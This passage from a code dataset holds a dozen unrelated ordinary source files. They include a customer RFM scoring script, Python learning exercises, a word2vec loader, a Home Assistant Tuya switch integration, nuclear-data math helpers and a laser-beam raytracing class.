segmented_rfm['LastVisited'].apply(RScore, args=('LastVisited',quantiles,))\r\nsegmented_rfm['f_quartile'] = segmented_rfm['TotalVisit'].apply(FMScore, args=('TotalVisit',quantiles,))\r\nsegmented_rfm['m_quartile'] = segmented_rfm['TotalAmount'].apply(FMScore, args=('TotalAmount',quantiles,))\r\n\r\nprint(segmented_rfm.head())\r\n\r\nsegmented_rfm['RFMScore'] = segmented_rfm.r_quartile.map(str) + segmented_rfm.f_quartile.map(str) \\\r\n + segmented_rfm.m_quartile.map(str)\r\n\r\nconn, curs = connectDB()\r\nfor index, item in segmented_rfm[segmented_rfm['RFMScore'] <= '444'].sort_values('TotalAmount', ascending=False).iterrows():\r\n SQL = \"\"\"INSERT INTO foodfie_analysis.RFM(CustomerId, Frequency, Recently, Monetary, R, F, M, RFMScore)\r\n VALUES({0}, {1}, {2}, {3}, {4}, {5}, {6}, '{7}')\r\n \"\"\".format(int(index), int(item['TotalVisit']), int(item['LastVisited']), int(item['TotalAmount']),\r\n int(item['r_quartile']), int(item['f_quartile']), int(item['m_quartile']), str(item['RFMScore']))\r\n curs.execute(SQL)\r\n conn.commit()\r\n\r\n\r\n\r\n# \"\"\"Get set go to take \"MOMOS BEYOND MOMOS\" with Foodfie!!! The much awaited Momos food festival, MOMOIESTA 2018 has kickstarted around you. The week long fest promises to be delightful for the momos lovers.Come and pamper your tastebuds.\r\n# Highlight of event:\r\n# Pasta momos
Momos 65
Momos chaat
Oreo momos
Chocolate momos
Cheese and Corn
Burger momos
Kurkure momos
Gravy momos
Afghai momos to steamed momos
there will be all sorts of striking fusion momos.\r\n#\r\n# Venue: Foodfie Candor Infospace and Infotch\r\n# Date: 9th April 2018 to 13th April 2018.\"\"\"\r\n","sub_path":"Analysis/RFM.py","file_name":"RFM.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"161242042","text":"\nl1 = [1, 2, 3, 4, 5,]\nex1 = [v for v in l1]\n#print(ex1)\nex2 = [v * 2 for v in l1]\n#print(ex2)\nex3 = [(v, v2) for v in l1 for v2 in range(3)]\n#print(ex3)\n\nl2 = ['luiz', 'mauro', 'maria']\nex4 = [var.replace('a', '@').upper() for var in l2]\n#print(ex4)\n\ntupla = (\n ('chave1', 'valor1'),\n ('chave2', 'valor2')\n)\n#ex5 = [(x, y) for x, y in tupla]\n#invertendo chave x valo:\nex5 = [(y, x) for x, y in tupla]\n#print(ex5)\nex5 = dict(ex5)\nprint(ex5['valor2'])\n\nl3 = list(range(10))\n#ex6 = [v for v in l3 if v % 2 == 0 if v % 3 == 0 if v % 8 == 0]\n#print(ex6)\nex7 = [v if v % 2 == 0 and v % 8 == 0 else '' for v in l3]\n#print(ex7)\n\nexe8 = '0123456789012345678901234567890123456789012345678901234567890123456789'\nn = 10\n#tupla\n#solucao = [exe8 (i, i + n) for i in range(0, len(exe8), n)]\n#lista\nsolucao = [exe8[i: i + n] for i in range(0, len(exe8), n)]\nsolucao = '.'.join(solucao)\nprint(solucao)\n\n","sub_path":"intermediario/list_comprehension.py","file_name":"list_comprehension.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"71939045","text":"import numpy as np\n\ndef readtospc(f):\n\n s = bytearray()\n ch = f.read(1)\n\n while ch != b'\\x20':\n s.extend(ch)\n ch = f.read(1)\n s = s.decode('utf-8')\n return s.strip()\n\nclass Word2VecModel:\n\n def __init__(self, filename, knownvocab=None, unifweight=None):\n\n uw = 0.0 if unifweight == None else unifweight\n self.vocab = {}\n self.vocab[\"\"] = 0\n with open(filename, \"rb\") as f:\n header = f.readline()\n vsz, self.dsz = map(int, header.split())\n\n if knownvocab is not None:\n self.vsz = 0\n for v in knownvocab:\n self.vsz += 1\n else:\n self.vsz = vsz\n\n self.weights = np.random.uniform(-uw, uw, (self.vsz+1, self.dsz))\n width = 4 * self.dsz\n k = 1\n # All attested word vectors\n for i in range(vsz):\n word = readtospc(f)\n raw = f.read(width)\n # If vocab list, not in: dont add, in:add, drop from list\n if word in self.vocab:\n continue\n\n if knownvocab is not None:\n if word not in knownvocab:\n continue\n\n # Otherwise drop freq to 0, for later\n knownvocab[word] = 0\n vec = np.fromstring(raw, dtype=np.float32)\n self.weights[k] = vec\n self.vocab[word] = k\n k = k + 1\n\n # Anything left over, unattested in w2v model, just use a random\n # initialization\n if knownvocab is not None:\n unknown = {v: cnt for v,cnt in knownvocab.items() if cnt > 0}\n for v in unknown:\n self.vocab[v] = k\n k = k + 1\n\n self.nullv = np.zeros(self.dsz, dtype=np.float32)\n self.weights[0] = self.nullv\n\n def lookup(self, word, nullifabsent=True):\n if word in self.vocab:\n return self.weights[self.vocab[word]]\n if nullifabsent:\n return None\n return self.nullv\n\nclass RandomInitVecModel:\n\n def __init__(self, dsz, knownvocab, counts=True, unifweight=None):\n\n uw = 0.0 if unifweight == None else unifweight\n self.vocab = {}\n self.vocab[\"\"] = 0\n self.dsz = dsz\n self.vsz = 0\n\n if counts is True:\n attested = {v: cnt for v,cnt in knownvocab.items() if cnt > 0}\n for k,v in enumerate(attested):\n self.vocab[v] = k\n k = k + 1\n self.vsz += 1\n else:\n print('Restoring existing vocab')\n self.vocab = knownvocab\n self.vsz = len(self.vocab) - 1\n\n self.weights = np.random.uniform(-uw, uw, (self.vsz+1, self.dsz))\n\n self.nullv = np.zeros(self.dsz, dtype=np.float32)\n self.weights[0] = self.nullv\n\n def lookup(self, word, nullifabsent=True):\n if word in self.vocab:\n return self.weights[self.vocab[word]]\n if nullifabsent:\n return None\n return self.nullv\n\nif __name__ == '__main__':\n w2v = Word2VecModel('/data/xdata/GoogleNews-vectors-negative300.bin')\n\n print(w2v.lookup('agjasgoikjagolkjajgr', False))\n print(w2v.lookup('agjasgoikjagolkjajgr', True))\n print(w2v.lookup('Daniel'))\n","sub_path":"seq2seq/python/w2v.py","file_name":"w2v.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"510689218","text":"import numpy as np\nfrom sklearn import neighbors\n\ndef load_data(filename):\n f = open(filename)\n lines = f.readlines()\n dataMat = np.zeros((len(lines), 3))\n classLabel = []\n for i in range(len(lines)):\n line = lines[i].strip().split(\"\\t\")\n dataMat[i, :] = line[0:3]\n classLabel.append(int(line[-1]))\n return dataMat, classLabel\n\ndef norm_data(dataMat):\n minVals = dataMat.min(axis=0)\n maxVals = dataMat.max(axis=0)\n ranges = maxVals - minVals\n normddata = (dataMat - minVals) / ranges\n return normddata, ranges, minVals\n\nif __name__ == \"__main__\":\n dataMat, classLabel = load_data(\"dataset.txt\")\n dataMat, ranges, minVals = norm_data(dataMat)\n k = 3\n clf = neighbors.KNeighborsClassifier(k, weights='uniform')\n clf.fit(dataMat, classLabel)\n resultList = ['not at all', 'in small doses', 'in large doses']\n percentTats = float(input(\"percentage of time spent playing video games ?\"))\n ffMiles = float(input(\"frequent filer miles earned per year?\"))\n iceCream = float(input(\"liters of ice cream consumed per year?\"))\n inArr = np.array([[ffMiles, percentTats, iceCream]])\n classifierResult = clf.predict((inArr-minVals)/ranges)\n print(\"You will probably like this person: \", resultList[classifierResult[0] - 1])\n","sub_path":"ML/src/chapter2/example1/sklearn_solve.py","file_name":"sklearn_solve.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"101533746","text":"'''\nあえて二重ループを使わない解法\n'''\n\n(N,Y) = [int(i) for i in input().split()]\n\n# y10k: 1万円札の枚数\n# y5k: 5千円札の枚数\n# y1k: 千円札の枚数\n\n# 暫定的に最も少ない枚数で設定金額を達成する\ny10k = Y // 10000\ny5k, y1k = divmod((Y%10000)/1000, 5)\n\n# 暫定的な総枚数\ncurrent_inbag = y10k+y5k+y1k\n# 設定枚数との差\ndiff = N - current_inbag\n \n# 以後、金額を変えずにdiffを減らすように両替していく\n\n# そもそもおかしいとき\nif Y > 10000*N or Y < 1000*N or diff < 0:\n print('-1 -1 -1')\n exit()\n\n# 1万円札 -> 千円札10枚\nwhile y10k > 0 and diff >= 9:\n y10k -= 1\n y1k += 10\n diff -= 9\n\n# 1万円札 -> 5千円札1枚+千円札5枚\nif y10k > 0 and diff >= 5:\n y10k -= 1\n y5k += 1\n y1k += 5\n diff -= 5\n\n# 1万円札 -> 5千円札2枚\n# 差の枚数を1枚ずつ刻めるの\nwhile y10k > 0 and diff > 0:\n y10k -= 1\n y5k += 2\n diff -= 1\n\n# 先に1万円札がなくなったとき\n# 5千円札 -> 千円札5枚\nif y10k == 0 and diff > 0:\n while y5k > 0 and diff >= 4:\n y5k -= 1\n y1k += 5\n diff -= 4\n\nif diff == 0:\n print('%d %d %d' % (y10k,y5k,y1k))\n exit()\n\nprint('-1 -1 -1')","sub_path":"AtCoder/ABC085C.py","file_name":"ABC085C.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"572509879","text":"#!/usr/bin/env python\nimport requests\nfrom json import loads\n\nimport yaml\nfrom colorama import init, Fore\n\nimport os\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\ninit()\nduration = 1\nfreq = 440\n\nwith open(dir_path + \"/config.yaml\") as f:\n docs = yaml.load_all(f, Loader=yaml.FullLoader)\n for doc in docs:\n for k, v in doc.items():\n if k == 'purple':\n purple_set = v\n elif k == 'green':\n green_set = v\n elif k == 'site':\n site = v\n\nresponse = requests.get(str(site), verify=False)\nfeed = loads(response.content)\nportals = feed['portals']\ndata = feed['locations']\nportal_dict = {}\n\nfor portal in portals:\n portal_dict[portal['key']] = portal['url']\n\ndef json_extract(obj, key):\n arr = []\n\n def extract(obj, arr, key):\n if isinstance(obj, dict):\n for k, v in obj.items():\n if isinstance(v, (dict, list)):\n extract(v, arr, key)\n elif k == key:\n arr.append(v)\n elif isinstance(obj, list):\n for item in obj:\n extract(item, arr, key)\n return arr\n\n values = extract(obj, arr, key)\n return values\n\n\ncount = 0\navailable_count = 0\nfor line in data:\n # print(str(line))\n # print(portal_dict[line['portal']])\n # continue\n\n available = line['available']\n if available is True:\n purple_found = False\n green_found = False\n for purple in purple_set:\n if (line['name'].find(purple) != -1):\n purple_found = True\n for green in green_set:\n if (line['name'].find(green) != -1):\n green_found = True\n prefix = Fore.MAGENTA if purple_found else Fore.RESET\n if purple_found:\n prefix = Fore.MAGENTA\n elif green_found:\n prefix = Fore.GREEN\n else:\n prefix = Fore.RESET\n\n\n print(prefix + line['name'])\n print(prefix + line['area'])\n print(prefix + portal_dict[line['portal']])\n print(prefix + str(line['appointments']['count']) + \" appointment slots available\")\n available_count = available_count + line['appointments']['count']\n print(prefix + str(line['appointments']['summary']))\n print()\n if count == 2:\n count = 0\nif available_count > 0:\n print(\"Available appointments total: \" + str(available_count))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"219783721","text":"#!/usr/bin/env python3\n\"\"\"Support for Tuya switches.\"\"\"\nfrom __future__ import annotations\n\nimport logging\nfrom typing import Any\n\nfrom tuya_iot import TuyaDevice, TuyaDeviceManager\n\nfrom homeassistant.components.switch import DOMAIN as DEVICE_DOMAIN, SwitchEntity\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.dispatcher import async_dispatcher_connect\n\nfrom .base import TuyaHaDevice\nfrom .const import (\n DOMAIN,\n TUYA_DEVICE_MANAGER,\n TUYA_DISCOVERY_NEW,\n TUYA_HA_DEVICES,\n TUYA_HA_TUYA_MAP,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\nTUYA_SUPPORT_TYPE = {\n \"kg\", # Switch\n \"cz\", # Socket\n \"pc\", # Power Strip\n \"cwysj\", # Pet Water Feeder\n}\n\n# Switch(kg), Socket(cz), Power Strip(pc)\n# https://developer.tuya.com/docs/iot/open-api/standard-function/electrician-category/categorykgczpc?categoryId=486118\nDPCODE_SWITCH = \"switch\"\nDPCODE_UV = \"uv\"\n\n\nasync def async_setup_entry(\n hass: HomeAssistant, _entry: ConfigEntry, async_add_entities\n):\n \"\"\"Set up tuya sensors dynamically through tuya discovery.\"\"\"\n _LOGGER.info(\"switch init\")\n\n hass.data[DOMAIN][TUYA_HA_TUYA_MAP].update({DEVICE_DOMAIN: TUYA_SUPPORT_TYPE})\n\n async def async_discover_device(dev_ids):\n \"\"\"Discover and add a discovered tuya sensor.\"\"\"\n _LOGGER.info(f\"switch add-> {dev_ids}\")\n if not dev_ids:\n return\n entities = await hass.async_add_executor_job(_setup_entities, hass, dev_ids)\n hass.data[DOMAIN][TUYA_HA_DEVICES].extend(entities)\n async_add_entities(entities)\n\n async_dispatcher_connect(\n hass, TUYA_DISCOVERY_NEW.format(DEVICE_DOMAIN), async_discover_device\n )\n\n device_manager = hass.data[DOMAIN][TUYA_DEVICE_MANAGER]\n device_ids = []\n for (device_id, device) in device_manager.device_map.items():\n if device.category in TUYA_SUPPORT_TYPE:\n device_ids.append(device_id)\n await async_discover_device(device_ids)\n\n\ndef _setup_entities(hass, device_ids: list):\n \"\"\"Set up Tuya Switch device.\"\"\"\n device_manager = hass.data[DOMAIN][TUYA_DEVICE_MANAGER]\n entities = []\n for device_id in device_ids:\n device = device_manager.device_map[device_id]\n if device is None:\n continue\n\n for function in device.function:\n if function.startswith(DPCODE_SWITCH):\n entities.append(TuyaHaSwitch(device, device_manager, function))\n continue\n\n if function == DPCODE_UV:\n entities.append(TuyaHaSwitch(device, device_manager, function))\n\n return entities\n\n\nclass TuyaHaSwitch(TuyaHaDevice, SwitchEntity):\n \"\"\"Tuya Switch Device.\"\"\"\n\n dp_code_switch = DPCODE_SWITCH\n\n def __init__(\n self, device: TuyaDevice, device_manager: TuyaDeviceManager, dp_code: str = \"\"\n ) -> None:\n \"\"\"Init TuyaHaSwitch.\"\"\"\n super().__init__(device, device_manager)\n\n self.dp_code = dp_code\n self.channel = (\n dp_code.replace(DPCODE_SWITCH, \"\")\n if dp_code.startswith(DPCODE_SWITCH)\n else dp_code\n )\n\n @property\n def unique_id(self) -> str | None:\n \"\"\"Return a unique ID.\"\"\"\n return f\"{super().unique_id}{self.channel}\"\n\n @property\n def name(self) -> str | None:\n \"\"\"Return Tuya device name.\"\"\"\n return self.tuya_device.name + self.channel\n\n @property\n def is_on(self) -> bool:\n \"\"\"Return true if switch is on.\"\"\"\n return self.tuya_device.status.get(self.dp_code, False)\n\n def turn_on(self, **kwargs: Any) -> None:\n \"\"\"Turn the switch on.\"\"\"\n self._send_command([{\"code\": self.dp_code, \"value\": True}])\n\n def turn_off(self, **kwargs: Any) -> None:\n \"\"\"Turn the device off.\"\"\"\n self._send_command([{\"code\": self.dp_code, \"value\": False}])\n","sub_path":"custom_components/tuya_v2/switch.py","file_name":"switch.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"354504595","text":"numero_1 = int(input('Primeiro número: '))\nnumero_2 = int(input('Segundo número: '))\nnumero_3 = int(input('Terceiro número: '))\n\nif numero_1 < numero_2 and numero_3:\n menor = numero_1\nelif numero_2 < numero_1 and numero_3:\n menor = numero_2\nelse:\n menor = numero_3\n\nif numero_1 > numero_2 and numero_3:\n maior = numero_1\nelif numero_2 > numero_1 and numero_3:\n maior = numero_2\nelse:\n maior = numero_3\n\nprint('\\nMaior: {}\\nMenor: {}'.format(maior, menor))\n\n","sub_path":"ex032.py","file_name":"ex032.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"651303902","text":"# <>\n# Copyright (c) 2016, Lawrence Livermore National Security, LLC.\n# Produced at the Lawrence Livermore National Laboratory.\n# Written by the LLNL Nuclear Data and Theory group\n# (email: mattoon1@llnl.gov)\n# LLNL-CODE-683960.\n# All rights reserved.\n# \n# This file is part of the FUDGE package (For Updating Data and \n# Generating Evaluations)\n# \n# When citing FUDGE, please use the following reference:\n# C.M. Mattoon, B.R. Beck, N.R. Patel, N.C. Summers, G.W. Hedstrom, D.A. Brown, \"Generalized Nuclear Data: A New Structure (with Supporting Infrastructure) for Handling Nuclear Data\", Nuclear Data Sheets, Volume 113, Issue 12, December 2012, Pages 3145-3171, ISSN 0090-3752, http://dx.doi.org/10. 1016/j.nds.2012.11.008\n# \n# \n# Please also read this link - Our Notice and Modified BSD License\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the disclaimer below.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the disclaimer (as noted below) in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of LLNS/LLNL nor the names of its contributors may be used\n# to endorse or promote products derived from this software without specific\n# prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL SECURITY, LLC,\n# THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# \n# \n# Additional BSD Notice\n# \n# 1. This notice is required to be provided under our contract with the U.S.\n# Department of Energy (DOE). This work was produced at Lawrence Livermore\n# National Laboratory under Contract No. DE-AC52-07NA27344 with the DOE.\n# \n# 2. Neither the United States Government nor Lawrence Livermore National Security,\n# LLC nor any of their employees, makes any warranty, express or implied, or assumes\n# any liability or responsibility for the accuracy, completeness, or usefulness of any\n# information, apparatus, product, or process disclosed, or represents that its use\n# would not infringe privately-owned rights.\n# \n# 3. Also, reference herein to any specific commercial products, process, or services\n# by trade name, trademark, manufacturer or otherwise does not necessarily constitute\n# or imply its endorsement, recommendation, or favoring by the United States Government\n# or Lawrence Livermore National Security, LLC. The views and opinions of authors expressed\n# herein do not necessarily state or reflect those of the United States Government or\n# Lawrence Livermore National Security, LLC, and shall not be used for advertising or\n# product endorsement purposes.\n# \n# <>\n\n\"\"\"\nThis module contains useful fudge math routines that do not fit into any other module.\n\"\"\"\n\nfrom pqu import PQU\nfrom fudge.core.utilities import brb\ntry :\n import numpy\n numpyFloat64 = numpy.float64( 1. )\nexcept :\n numpyFloat64 = 1.\n\n__metaclass__ = type\n\ndef runningZSum( data, xLabel = None, yLabel = None, zLabel = None, normalize = False ) :\n \"\"\"Returns the running sum of dy * z (normalized to 1 of normalize is True) for each x as an endl3dmath object.\n Data must be list of ( x, list of ( y, z ) ).\"\"\"\n\n d3 = []\n for x_yz in data : d3.append( [ x_yz[0], runningYSum( x_yz[1], normalize = normalize ).data ] )\n from fudge.legacy.endl import endl3dmathClasses\n return endl3dmathClasses.endl3dmath( d3, xLabel = xLabel, yLabel = yLabel, zLabel = zLabel, checkDataType = 0 )\n\ndef runningYSum( data, normalize = False ) :\n \"\"\"Returns the running sum of dx * y (normalized to 1 of normalize is True) as an endl2dmath object. \n Data must be list of ( x, y ).\"\"\"\n\n x1 = None\n runningSum = []\n for xy in data :\n x2 = xy[0]\n y2 = xy[1]\n if ( x1 == None ) :\n Sum = 0.\n else :\n Sum += 0.5 * ( y2 + y1 ) * ( x2 - x1 )\n runningSum.append( [ x2, Sum ] )\n x1 = x2\n y1 = y2\n if( normalize and ( Sum != 0. ) ) :\n for xy in runningSum : xy[1] /= Sum\n from fudge.legacy.endl import endl2dmathClasses\n return endl2dmathClasses.endl2dmath( runningSum, checkDataType = 0 )\n\ndef ZSum( data ) :\n \"\"\"Returns the area under the curve z(y) for each x as an endl2dmath object. Data must be list of\n ( x, list of ( y, z ) ).\"\"\"\n\n d2 = []\n for x_yz in data : d2.append( [ x_yz[0], YSum( x_yz[1] ) ] )\n from fudge.legacy.endl import endl2dmathClasses\n return endl2dmathClasses.endl2dmath( d2, checkDataType = 0 )\n\ndef YSum( data ) :\n \"Returns the area under the curve y(x). Data must be list of list( x, y ).\"\n\n x1 = None\n for x2, y2 in data :\n if ( x1 == None ) :\n Sum = 0.\n else :\n Sum += ( y2 + y1 ) * ( x2 - x1 )\n x1 = x2\n y1 = y2\n return 0.5 * Sum\n\nclass fastSumOfManyAddends :\n \"\"\"This class in designed to sum a lot of endl2dmath or fudge2dmath object together efficiently. For example,\n consider the list f2d of 100,000 fudge2dmath objects that are to be summed. One way to do this is as\n s = fudge2dmath( )\n for f in f2d : s = s + f\n\n In general, this is very inefficient and will take a long time. Using, this class as\n\n fs = fastSumOfManyAddends( )\n for f in f2d : fs.appendAddend( f )\n s = fs.returnSum( )\n\n is, in general, much more efficient (i.e., runs a lot faster) and it should never be less efficient.\n\n While this class was designed for endl2dmath and fudge2dmath objects, it should work for any object\n for which the '+' operation is defined.\"\"\"\n\n def __init__( self ) :\n \"\"\"Constructor for fastSumOfManyAddends.\"\"\"\n\n self.clear( )\n\n def appendAddend( self, addend ) :\n \"\"\"Adds addend to current sum efficiently.\"\"\"\n\n n = len( self.list )\n for i in xrange( n ) :\n if( self.list[i] == None ) :\n self.list[i] = addend\n addend = None\n break\n else :\n addend = addend + self.list[i]\n self.list[i] = None\n if( addend != None ) : self.list.append( addend )\n\n def clear( self ) :\n \"\"\"Clears currently summed data.\"\"\"\n\n self.list = []\n\n def returnSum( self ) :\n \"\"\"Returns the current sum of all addends appended.\"\"\"\n\n s = None\n for l in self.list :\n if( l != None ) :\n if( s == None ) :\n s = l\n else :\n s = s + l\n return( s )\n\ndef getValue( n ) :\n\n if( isNumber( n ) ) : return( n )\n if( isinstance( n, PQU.PQU ) ) : return( n.getValue( ) )\n raise Exception( 'Invalue number object = %s' % brb.getType( n ) )\n","sub_path":"fudge/legacy/endl/endlmath.py","file_name":"endlmath.py","file_ext":"py","file_size_in_byte":7646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"417215874","text":"print(\"Let's see if we can get this sorted\")\nfixed = False\nprint(\"Turn Your Computer On\")\n\ndef plugged_in():\n plugged_in = input(\"Is it plugged in(y/n)? \")\n return plugged_in == \"y\"\n\ndef plug_it_in():\n print(\"Plug it in\")\n working = input(\"Did this fix the problem(y/n)? \")\n return working == \"y\"\n\nstatus = input(\"Did it boot up (y/n)? \")\nif status == \"y\":\n fixed = True\nelif not plugged_in():\n if plug_it_in():\n fixed = True\n\nif fixed == True:\n print(\"Login with password\")\nelse:\n print(\"Your computer is broken\")\n\nprint(\"Done\")\n","sub_path":"week_01/day_2/conditionals_lab/solution_functions.py","file_name":"solution_functions.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"643665953","text":"from .matrixgroup import *\nfrom .imagingpath import *\n\n\nclass LaserPath(MatrixGroup):\n \"\"\"LaserPath: the main class of the module for coherent\n laser beams: it is the combination of Matrix() or MatrixGroup()\n to be used as a laser path with a laser beam (GaussianBeam)\n at the entrance.\n\n Usage is to create the LaserPath(), then append() elements\n and display(). You may change the inputBeam to any GaussianBeam(),\n or provide one to display(beam=GaussianBeam())\n\n Gaussian laser beams are not \"blocked\" by aperture. The formalism\n does not explicitly allow that. However, if it appears that a \n GaussianBeam() would be clipped by finite aperture, a property \n is set to indicate it, but it will propagate nevertheless\n and without diffraction due to that aperture.\n \"\"\"\n\n def __init__(self, elements=None, label=\"\"):\n self.inputBeam = None\n self.isResonator = False\n self.showElementLabels = True\n self.showPointsOfInterest = True\n self.showPointsOfInterestLabels = True\n self.showPlanesAcrossPointsOfInterest = True\n super(LaserPath, self).__init__(elements=elements, label=label)\n\n def eigenModes(self):\n \"\"\"\n Returns the two complex radii that are identical after a\n round trip, assuming the matrix of the LaserPath() is one\n round trip: you will need to duplicate elements in reverse\n and append them manually. \n \"\"\"\n if not self.hasPower:\n return None, None\n\n b = self.D - self.A\n sqrtDelta = cmath.sqrt(b * b + 4.0 * self.B * self.C)\n\n q1 = (- b + sqrtDelta) / (2.0 * self.C)\n q2 = (- b - sqrtDelta) / (2.0 * self.C)\n\n return (GaussianBeam(q=q1), GaussianBeam(q=q2))\n\n def laserModes(self):\n \"\"\"\n Returns the laser modes that are physical (finite) when \n calculating the eigenmodes. \n \"\"\"\n\n (q1, q2) = self.eigenModes()\n q = []\n if q1 is not None and q1.isFinite:\n q.append(q1)\n\n if q2 is not None and q2.isFinite:\n q.append(q2)\n\n return q\n\n def display(self, inputBeam=None, inputBeams=None, comments=None): # pragma: no cover\n \"\"\" Display the optical system and trace the laser beam. \n If comments are included they will be displayed on a\n graph in the bottom half of the plot.\n\n \"\"\"\n\n if self.isResonator:\n beams = self.laserModes()\n if self.label == \"\":\n self.label = \"Laser modes as calculated\"\n elif inputBeam is not None:\n beams = [inputBeam]\n elif inputBeams is not None:\n beams = inputBeams\n else:\n beams = [self.inputBeam]\n\n if self.label == \"\":\n self.label = \"User-specified gaussian beams\"\n\n if comments is not None:\n fig, (axes, axesComments) = plt.subplots(2, 1, figsize=(10, 7))\n axesComments.axis('off')\n axesComments.text(0., 1.0, comments, transform=axesComments.transAxes,\n fontsize=10, verticalalignment='top')\n else:\n fig, axes = plt.subplots(figsize=(10, 7))\n\n self.createBeamTracePlot(axes=axes, beams=beams)\n\n self._showPlot()\n\n def createBeamTracePlot(self, axes, beams): # pragma: no cover\n \"\"\" Create a matplotlib plot to draw the laser beam and the elements.\n \"\"\"\n\n displayRange = 2 * self.largestDiameter()\n if displayRange == float('+Inf'):\n displayRange = self.inputBeam.w * 6\n\n axes.set(xlabel='Distance', ylabel='Height', title=self.label)\n axes.set_ylim([-displayRange / 2 * 1.2, displayRange / 2 * 1.2])\n\n self.drawAt(z=0, axes=axes)\n\n for beam in beams:\n self.drawBeamTrace(axes, beam)\n self.drawWaists(axes, beam)\n\n return axes\n\n def rearrangeBeamTraceForPlotting(self, rayList):\n x = []\n y = []\n for ray in rayList:\n x.append(ray.z)\n y.append(ray.w)\n return (x, y)\n\n def drawBeamTrace(self, axes, beam): # pragma: no cover\n \"\"\" Draw beam trace corresponding to input beam \n Because the laser beam diffracts through space, we cannot\n simply propagate the beam over large distances and trace it\n (as opposed to rays, where we can). We must split Space() \n elements into sub elements to watch the beam size expand.\n \n We arbitrarily split Space() elements into N sub elements\n before plotting.\n \"\"\"\n\n N = 100\n highResolution = ImagingPath()\n for element in self.elements:\n if isinstance(element, Space):\n for i in range(N):\n highResolution.append(Space(d=element.L / N,\n n=element.frontIndex))\n else:\n highResolution.append(element)\n\n beamTrace = highResolution.trace(beam)\n (x, y) = self.rearrangeBeamTraceForPlotting(beamTrace)\n axes.plot(x, y, 'r', linewidth=1)\n axes.plot(x, [-v for v in y], 'r', linewidth=1)\n\n def drawWaists(self, axes, beam): # pragma: no cover\n \"\"\" Draws the expected waist (i.e. the focal spot or the spot where the\n size is minimum) for all positions of the beam. This will show \"waists\" that\n are virtual if there is an additional lens between the beam and the expceted\n waist.\n\n It is easy to obtain the waist position from the complex radius of curvature\n because it is the position where the complex radius is imaginary. The position\n returned is relative to the position of the beam, which is why we add the actual\n position of the beam to the relative position. \"\"\"\n\n (xScaling, yScaling) = self.axesToDataScale(axes)\n arrowWidth = xScaling * 0.01\n arrowHeight = yScaling * 0.03\n arrowSize = arrowHeight * 3\n\n beamTrace = self.trace(beam)\n for beam in beamTrace:\n relativePosition = beam.waistPosition\n position = beam.z + relativePosition\n size = beam.waist\n\n axes.arrow(position, size + arrowSize, 0, -arrowSize,\n width=0.1, fc='g', ec='g',\n head_length=arrowHeight, head_width=arrowWidth,\n length_includes_head=True)\n axes.arrow(position, -size - arrowSize, 0, arrowSize,\n width=0.1, fc='g', ec='g',\n head_length=arrowHeight, head_width=arrowWidth,\n length_includes_head=True)\n","sub_path":"raytracing/laserpath.py","file_name":"laserpath.py","file_ext":"py","file_size_in_byte":6660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"441727613","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# cw2.py\n# \n# \n# \n\n\ndef main(args):\n\t\n\t\n\t\n\t\n\t\n\tn = int(input(\"Podaj liczbę naturalną \")) #Program pobiera cyfrę n\n\twhile n < 0: #Sprawdza czy jest ona naturalna jeżeli nie powiadami o tym i powtórzy \n\t\tprint(\"Liczba nie jest naturalna\")\n\t\tn = int(input(\"Podaj liczbę naturalną \"))\n\tm = int(input(\"Podaj kolejną liczbę naturalną \")) \t #Program pobiera cyfrę m\n\twhile m < n: #Sprawdza czy jest ona naturalna jeżeli nie powiadami o tym i 